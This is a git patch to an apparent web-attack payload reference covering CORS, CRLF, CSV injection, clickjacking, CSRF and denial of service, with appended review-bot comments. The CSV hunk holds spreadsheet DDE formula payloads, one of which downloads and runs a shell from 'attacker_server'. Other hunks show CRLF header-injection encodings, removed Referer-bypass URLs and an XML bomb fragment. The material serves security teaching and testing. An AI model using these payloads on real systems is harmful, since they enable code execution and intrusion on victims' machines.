From e138308d3d08392dfc20cbb9637993581132554b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 4 Nov 2024 18:00:07 +0100 Subject: [PATCH] References updated for CORS CRLF CSV --- CORS Misconfiguration/README.md | 12 +-- CRLF Injection/{ => Files}/crlfinjection.txt | 0 CRLF Injection/README.md | 35 +++++---- CSV Injection/README.md | 62 ++++++++++------ Clickjacking/README.md | 23 +++--- Cross-Site Request Forgery/README.md | 78 +++++--------------- Denial of Service/README.md | 39 +++++++--- 7 files changed, 125 insertions(+), 124 deletions(-) rename CRLF Injection/{ => Files}/crlfinjection.txt (100%) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index e9209cb2..2cf45566 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md 
@@ -264,9 +264,9 @@ function reqListener() { ## References -* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) -* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) -* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) -* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) -* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) -* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) +- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/) +- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors) +- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 
2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) \ No newline at end of file diff --git a/CRLF Injection/crlfinjection.txt b/CRLF Injection/Files/crlfinjection.txt similarity index 100% rename from CRLF Injection/crlfinjection.txt rename to CRLF Injection/Files/crlfinjection.txt diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 7419a65b..b5a1d049 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -4,16 +4,18 @@ > A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. + ## Summary -- [CRLF - Add a cookie](#crlf---add-a-cookie) -- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) -- [CRLF - Write HTML](#crlf---write-html) -- [CRLF - Filter Bypass](#crlf---filter-bypass) +- [Add a cookie](#add-a-cookie) +- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass) +- [Write HTML](#write-html) +- [Filter Bypass](#filter-bypass) - [Labs](#labs) - [References](#references) -## CRLF - Add a cookie + +## Add a cookie Requested page @@ -36,7 +38,8 @@ x-content-type-options: nosniff x-xss-protection: 1; mode=block ``` -## CRLF - Add a cookie - XSS Bypass + +## Add a cookie - XSS Bypass Requested page @@ -67,7 +70,8 @@ X-XSS-Protection:0 0 ``` -## CRLF - Write HTML + +## Write HTML Requested page @@ -89,7 +93,8 @@ Content-Length: 34 You have been Phished ``` -## CRLF - Filter Bypass + +## Filter Bypass Using UTF-8 encoding 
@@ -99,18 +104,18 @@ Using UTF-8 encoding Remainder: -* %E5%98%8A = %0A = \u560a -* %E5%98%8D = %0D = \u560d -* %E5%98%BE = %3E = \u563e (>) -* %E5%98%BC = %3C = \u563c (<) +* `%E5%98%8A` = `%0A` = \u560a +* `%E5%98%8D` = `%0D` = \u560d +* `%E5%98%BE` = `%3E` = \u563e (>) +* `%E5%98%BC` = `%3C` = \u563c (<) ## Labs -* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) +* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) ## References -* https://www.owasp.org/index.php/CRLF_Injection -* https://vulners.com/hackerone/H1:192749 +- [CRLF Injection - CWE-93 - OWASP - May 20, 2022](https://www.owasp.org/index.php/CRLF_Injection) +- [Starbucks: [newscdn.starbucks.com] CRLF Injection, XSS - Bobrov - 2016-12-20](https://vulners.com/hackerone/H1:192749) \ No newline at end of file diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 75621d84..91dc4948 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md 
@@ -4,44 +4,58 @@ Many web applications allow the user to download content such as templates for i ## Exploit -Basic exploit with Dynamic Data Exchange +Basic exploits with **Dynamic Data Exchange**. + + +Payload: pop a calc ```powershell -# pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 =2+5+cmd|' /C calc'!A0 +``` -# pop a notepad +Payload: pop a notepad + +```powershell =cmd|' /C notepad'!'A1' +``` -# powershell download and execute +Payload: powershell download and execute + +```powershell =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 +``` -# msf smb delivery with rundll32 -=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 +Payload: Prefix obfuscation and command chaining -# Prefix obfuscation and command chaining +```powershell =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A +thespanishinquisition(cmd|'/c calc.exe'!A = cmd|'/c calc.exe'!A - -# Using rundll32 instead of cmd -=rundll32|'URL.dll,OpenURL calc.exe'!A -=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A - -# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. -= C m D | '/ c c al c . e x e ' ! A - ``` -Technical Details of the above payload: +Payload: Using rundll32 instead of cmd + +```powershell +=rundll32|'URL.dll,OpenURL calc.exe'!A +=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A +``` + +Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. + +```powershell += C m D | '/ c c al c . e x e ' ! 
A +``` + +Technical details of the above payloads: - `cmd` is the name the server can respond to whenever a client is trying to access the server - `/C` calc is the file name which in our case is the calc(i.e the calc.exe) - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data + Any formula can be started with ```powershell 
@@ -51,13 +65,13 @@ Any formula can be started with @ ``` + ## References -* [OWASP - CSV Excel Macro Injection](https://owasp.org/www-community/attacks/CSV_Injection) -* [Google Bug Hunter University - CSV Excel formula injection](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) -* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) -* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) -* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) -* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) -* [Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) - +- [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection) +- [CSV Excel formula injection - Google Bug Hunter University - May 22, 2022](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) +- [CSV Injection – A Guide To Protecting CSV Files - Akansha Kesharwani - 30/11/2017](https://payatu.com/csv-injection-basic-to-exploit/) +- [From CSV to Meterpreter - Adam Chester - November 05, 2015](https://blog.xpnsec.com/from-csv-to-meterpreter/) +- [The Absurdly Underestimated Dangers of CSV Injection - George Mauer - 7 October, 2017](http://georgemauer.net/2017/10/07/csv-injection.html) +- [Three New DDE Obfuscation Methods - ReversingLabs - September 24, 2018](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) +- [Your Excel Sheets Are Not Safe! 
Here's How to Beat CSV Injection - we45 - October 5, 2020](https://www.we45.com/post/your-excel-sheets-are-not-safe-heres-how-to-beat-csv-injection) \ No newline at end of file diff --git a/Clickjacking/README.md b/Clickjacking/README.md index 2f955e49..c49e7cae 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -83,17 +83,18 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in ``` * Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage. - ```html - -
- - ``` + +```html + + + +``` ### Execution Methods diff --git a/Cross-Site Request Forgery/README.md b/Cross-Site Request Forgery/README.md index 493b9f88..d8006367 100644 --- a/Cross-Site Request Forgery/README.md +++ b/Cross-Site Request Forgery/README.md @@ -16,11 +16,6 @@ * [JSON GET - Simple Request](#json-get---simple-request) * [JSON POST - Simple Request](#json-post---simple-request) * [JSON POST - Complex Request](#json-post---complex-request) -* [Bypass referer header validation check](#bypass-referer-header-validation) - * [Basic payload](#basic-payload) - * [With question mark payload](#with-question-mark-payload) - * [With semicolon payload](#with-semicolon-payload) - * [With subdomain payload](#with-subdomain-payload) * [Labs](#labs) * [References](#references) 
@@ -151,65 +146,32 @@ xhr.send('{"role":admin}'); ``` -## Bypass referer header validation - -### Basic payload -``` -1) Open https://attacker.com/csrf.html -2) Referer header is .. - -Referer: https://attacker.com/csrf.html -``` -### With question mark(`?`) payload -``` -1) Open https://attacker.com/csrf.html?trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html?trusted.domain.com -``` - -### With semicolon(`;`) payload -``` -1) Open https://attacker.com/csrf.html;trusted.domain.com -2) Referer header is .. - -Referer: https://attacker.com/csrf.html;trusted.domain.com -``` - -### With subdomain payload -``` -1) Open https://trusted.domain.com.attacker.com/csrf.html -2) Referer headers is .. - -Referer: https://trusted.domain.com.attacker.com/csrf.html -``` - ## Labs -* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) -* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) -* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) -* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) -* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) -* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) -* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) -* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) +* [PortSwigger - CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) +* 
[PortSwigger - CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) +* [PortSwigger - CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) +* [PortSwigger - CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) +* [PortSwigger - CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) +* [PortSwigger - CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) +* [PortSwigger - CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) +* [PortSwigger - CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) ## References - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) -- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) -- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) -- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) -- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/) -- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820) -- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - 
phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) -- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) -- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346) -- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) -- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) -- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0) +- [Cross-Site Request Forgery (CSRF) - OWASP - Apr 19, 2024](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)) +- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton - July 26, 2015](https://whitton.io/articles/messenger-site-wide-csrf/) +- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial - 19 July 2016](https://web.archive.org/web/20170607102958/https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) +- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali - 2014/10/09](https://web.archive.org/web/20141203184956/http://yasserali.com/hacking-paypal-accounts-with-one-click/) +- [Add tweet to collection CSRF - Vijay Kumar (indoappsec) - November 21, 2015](https://hackerone.com/reports/100820) +- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd - October 16, 2015](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) +- [How I Hacked Your Beats Account? 
Apple Bug Bounty - @aaditya_purani - 2016/07/20](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) +- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Eugene Yakovchuk - July 2, 2017](https://hackerone.com/reports/245346) +- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration - Josip Franjkovic - January 15th, 2018](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) +- [Cross Site Request Forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/) +- [Cross-Site Request Forgery Attack - PwnFunction - 5 Apr. 2019](https://www.youtube.com/watch?v=eWEgUcHPle0) - [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f) -- [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) +- [Bypass Referer Check Logic for CSRF - hahwul - Oct 11, 2019](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/) \ No newline at end of file diff --git a/Denial of Service/README.md b/Denial of Service/README.md index a3225050..f063c308 100644 --- a/Denial of Service/README.md +++ b/Denial of Service/README.md 
@@ -5,12 +5,16 @@ ## Summary -* [DoS - Locking Customer Accounts](#dos---locking-customer-accounts) -* [DoS - File Limits on FileSystem](#dos---file-limits-on-filesystem) -* [DoS - Memory Exhaustion - Technology Related](#dos---memory-exhaustion---technology-related) +* [Examples](#examples) + * [Locking Customer Accounts](#locking-customer-accounts) + * [File Limits on FileSystem](#file-limits-on-filesystem) + * [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related) +* [References](#references) -## DoS - Locking Customer Accounts +## Examples + +### Locking Customer Accounts Example of Denial of Service that can occur when testing customer accounts. Be very careful as this is most likely **out-of-scope** and can have a high impact on the business. @@ -21,7 +25,7 @@ Be very careful as this is most likely **out-of-scope** and can have a high impa ``` -## DoS - File Limits on FileSystem +### File Limits on FileSystem When a process is writing a file on the server, try to reach the maximum number of files allowed by the filesystem format. The system should output a message: `No space left on device` when the limit is reached. @@ -41,9 +45,9 @@ FAT32 has a significant limitation of **4 GB**, which is why it's often replaced Modern filesystems like BTRFS, ZFS, and XFS support exabyte-scale files, well beyond current storage capacities, making them future-proof for large datasets. -## DoS - Memory Exhaustion - Technology Related +### Memory Exhaustion - Technology Related -Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory +Depending on the technology used by the website, an attacker may have the ability to trigger specific functions or paradigm that will consume a huge chunk of memory. * **XML External Entity**: Billion laughs attack/XML bomb ```xml 
@@ -63,7 +67,22 @@ Depending on the technology used by the website, an attacker may have the abilit ]>
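Review bot: in the `CORS Misconfiguration/README.md` references hunk the bullet marker changes from `*` to `-` while lists rewritten elsewhere in this same patch (the Labs list in `CRLF Injection/README.md`, the Labs list in `Cross-Site Request Forgery/README.md`) keep `*`, so files end up with two list styles a few lines apart; settle on one marker for reference lists. The file also still ends with `\ No newline at end of file` after the rewrite, so add the trailing newline while the last line is being touched.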
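Review bot: in the `@@ -4,16 +4,18 @@` hunk of `CRLF Injection/README.md`, renaming `## CRLF - Add a cookie` (and its three sibling headings) changes the generated anchors from `#crlf---add-a-cookie` to `#add-a-cookie`; the in-file Summary is updated, but any other README or external write-up linking to the old anchors now lands at the top of the page. Grep the repository for `crlf---` before merging and consider whether the old anchors need to be preserved.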
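Review bot: in the `@@ -99,18 +104,18 @@` hunk of `CRLF Injection/README.md`, the unchanged context line `Remainder:` directly above the rewritten encoding list is a typo for `Reminder:`; since the four lines under it are already being rewritten, fix the label in the same change. In the same hunk the Labs list keeps `*` while the References list below it switches to `-`, leaving two bullet styles in adjacent sections of one file.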
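Review bot: the `@@ -4,44 +4,58 @@` hunk of `CSV Injection/README.md` drops the `# msf smb delivery with rundll32` payload line entirely while the commit subject says only that references were updated; if the removal is intentional, state it in the commit message or split it into its own commit so it is reviewable rather than hidden in a formatting change. The restructuring also inserts two consecutive blank lines before `Payload: pop a calc`, and the new per-payload fences keep the `powershell` tag for what are spreadsheet formulas, which mislabels the snippets for syntax highlighting.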
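Review bot: the `@@ -151,65 +146,32 @@` hunk of `Cross-Site Request Forgery/README.md` deletes the whole `## Bypass referer header validation` section and its four subsections (the matching Summary entries go in the `@@ -16,11 +16,6 @@` hunk), yet the commit subject mentions only CORS, CRLF and CSV reference updates. Note the removal in the commit message or move the material elsewhere rather than dropping it unannounced; the hahwul "Bypass Referer Check Logic for CSRF" reference covering the same topic is kept, so the topic itself is evidently still in scope.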
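Review bot: the `@@ -5,12 +5,16 @@` hunk of `Denial of Service/README.md` adds `* [References](#references)` to the Summary, but no `## References` heading appears in any hunk of this file within the patch; confirm the section exists so the new TOC entry is not a dead link.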
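Review bot: in the `@@ -41,9 +45,9 @@` hunk of `Denial of Service/README.md`, the rewritten sentence under `### Memory Exhaustion - Technology Related` only appends a period; while touching it, also fix `specific functions or paradigm` to `specific functions or paradigms` so number agrees.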